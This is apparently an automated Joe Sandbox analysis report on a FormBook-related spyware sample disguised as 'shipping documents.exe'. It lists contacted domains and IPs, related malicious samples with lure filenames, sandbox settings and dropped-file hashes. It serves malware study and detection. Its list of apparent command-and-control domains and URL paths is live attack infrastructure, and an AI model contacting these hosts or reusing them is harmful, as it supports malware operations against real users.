https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png	clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	clip.exe, 00000004.00000002.4519037536.0000000006136000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000037E6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png	clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/images/iOS-114.png	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.networksolutions.com/	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.000000000595C000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.000000000300C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/backup.png	clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.000000000595C000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.000000000300C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/styles/reset.css	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-57.png	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	clip.exe, 00000004.00000002.4519037536.0000000006136000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000037E6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc	RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4519511568.0000000004A70000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.251.54.212	www.anuts.top	United States	62468	VPSQUANUS	false
172.67.210.102	www.dmtxwuatbz.cc	United States	13335	CLOUDFLARENETUS	false
213.145.228.16	www.sandranoll.com	Austria	25575	DOMAINTECHNIKAT	false
194.9.94.85	www.xn--matfrmn-jxa4m.se	Sweden	39570	LOOPIASE	false
5.44.111.162	www.hprlz.cz	Germany	45031	PROVIDERBOXIPv4IPv6DUS1DE	false
217.160.0.106	www.catherineviskadi.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
208.91.197.27	www.bfiworkerscomp.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
194.58.112.174	www.helpers-lion.online	Russian Federation	197695	AS-REGRU	false
199.192.19.19	www.telwisey.info	United States	22612	NAMECHEAP-NETUS	false
43.252.167.188	www.xn--fhq1c541j0zr.com	Hong Kong	38277	CLINK-AS-APCommuniLinkInternetLimitedHK	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1492009
Start date and time:	2024-08-13 06:41:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	shipping documents.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@14/11
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 94% Number of executed functions: 50 Number of non-executed functions: 274
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RxbWnCRczoMimJmDFzH.exe, PID 7108 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:42:58	API Interceptor	12571075x Sleep call for process: clip.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.251.54.212	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/d5fo/
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/
	BL7247596940.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
	Arrival Notice.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.anuts.top/niik/
172.67.210.102	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
213.145.228.16	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	strg.or.at/wordpress/wp-login.php
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/zg5v/
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/cga5/
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sandranoll.com/4bud/
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.dmtxwuatbz.cc	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Attendance list.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Swift Copy #U00a362,271.03.Pdf.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	PO-104678522.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	NEW ORDER-RFQ#10112023Q4.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
	NEW ORDER 75647839384.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
www.sandranoll.com	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Attendance list.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.145.228.16
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	DRAFT DOCS RSHA25491003.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
www.anuts.top	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Attendance list.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	2OdHcYtYOMOepjD.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Tekstlinie.vbs	Get hash	malicious	FormBook, GuLoader	Browse	23.251.54.212
	Purchase order.pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	dMY6QiHAIpPPqiV.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
www.xn--matfrmn-jxa4m.se	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Attendance list.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	D7KV2Z73zC.rtf	Get hash	malicious	FormBook	Browse	194.9.94.85
	Scan Doc.docx.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	BASF Purchase Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
www.catherineviskadi.com	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	Attendance list.exe	Get hash	malicious	FormBook	Browse	217.160.0.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DOMAINTECHNIKAT	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	213.145.228.16
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Attendance list.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.145.228.16
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
CLOUDFLARENETUS	Steve Avery-MFA-Configuration-Update.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	Capitol Bio - Stockholms fotografier och videor bryter mot upphovsr#U00e4tten..eml	Get hash	malicious	Unknown	Browse	104.20.6.133
	Capitol Bio - Stockholms fotografier och videor bryter mot upphovsr#U00e4tten..eml	Get hash	malicious	Unknown	Browse	104.21.90.53
	http://omnatuor.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	product_list.xls	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.AutoIt.1430.14095.11777.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	https://docs.edocssign.org/download/document/31b9ff/da804b8a-d213-40ab-8739-74d591a56c88	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://human-resources-support.com/en/Forget/?secret=3o4HJfAY9Y0YG3jYHiKS9NbRN0vG4JczGfv3	Get hash	malicious	Unknown	Browse	172.67.158.163
	http://pub-6c106f46ecfb482b9d7517d3866c2a72.r2.dev/index.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://metsamesklognix.gitbook.io/us	Get hash	malicious	Unknown	Browse	104.18.138.17
VPSQUANUS	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	v9.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	1.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	v9.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.ppc.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.175
PROVIDERBOXIPv4IPv6DUS1DE	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	RAbSVWi6Lh.elf	Get hash	malicious	Mirai	Browse	91.206.143.156
	Yb6ztdvQaB.elf	Get hash	malicious	Unknown	Browse	93.90.186.36
	5Jan3SztHt.elf	Get hash	malicious	Unknown	Browse	5.44.126.238
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	Attendance list.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	62c.js	Get hash	malicious	Unknown	Browse	5.44.111.28
	62c.js	Get hash	malicious	Unknown	Browse	5.44.111.28
LOOPIASE	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	http://tok2np0cklt.top/	Get hash	malicious	Unknown	Browse	194.9.94.85
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Attendance list.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85

Process:	C:\Windows\SysWOW64\clip.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autD919.tmp

Download File

Process:	C:\Users\user\Desktop\shipping documents.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.99525176452656
Encrypted:	true
SSDEEP:	6144:OUxWryXv0ooCLk6eDp4spmBmGRMGC+zHxK7sNY9A:OYUIvho2eDEsGRMGLHxK7s+9A
MD5:	3BC6736E3CEB3D440C2642D40B2896DE
SHA1:	1675E8E2A3C73E7AC91F476DB0269153580A330A
SHA-256:	1C60549FFF6C88D8B62E9F3FA9D38F9A134B4CA0326CFA8BE38F71BBD890E2CB
SHA-512:	916AEE941C838EEC8242CCF04DF4733D3856C4A8B8C705BBFE1E786C8CB299D84B765F02710223A57814127D5F7136B83E68B1C27C3AD4249B74D4B2BBE1E71B
Malicious:	false
Reputation:	low
Preview:	.m...RPVU.._....z.UD...c5Z...EACV8GQ9F2UGS7NK6RPVUEACV8GQ9F.UGS9Q.8R._.d.B..f.Q/Au7!X)9W?p54+/,".%4.4G;g:Yn.y.p;:!$m[5Mu9F2UGS77J?.m62.\|#1.z1^.(....,.H...y!$."...zR2..^-#.27.UEACV8GQi.2U.R6NZoj0VUEACV8G.9D3^FX7N[2RPVUEACV8gD9F2EGS7nO6RP.UEQCV8EQ9@2UGS7NK0RPVUEACV.CQ9D2UGS7NI6..VUUACF8GQ9V2UWS7NK6R@VUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACxL")MF2U.\3NK&RPVEAACF8GQ9F2UGS7NK6RpVU%ACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV8GQ9F2UGS7NK6RPVUEACV

C:\Users\user\AppData\Local\Temp\autD968.tmp

Download File

Process:	C:\Users\user\Desktop\shipping documents.exe
File Type:	data
Category:	dropped
Size (bytes):	9778
Entropy (8bit):	7.637692690718555
Encrypted:	false
SSDEEP:	192:CZIUd07023mEBuHJLzyvek8KIqvJK92ptYhbmySaJU97QM/2Q:Yd07ZuhzEeoIqvJKCciha7K1
MD5:	645EFEB1FE176D5E03950F532644D639
SHA1:	C1F097A3AC308A00133FF86F14BD3B110F91CD81
SHA-256:	F566488BD59362CD457B7DC37EFB14C931FC48A209EF7D0E1AF71D5FCFCE812C
SHA-512:	F6F61A1D156324532E4B5E89A1A076EC1D38ED580C3F81F217694F54AF12709DC01C40C8F06487E7AA81EAE57B836F6905845B739DBCDAA9CCDDA8324A17C146
Malicious:	false
Reputation:	low
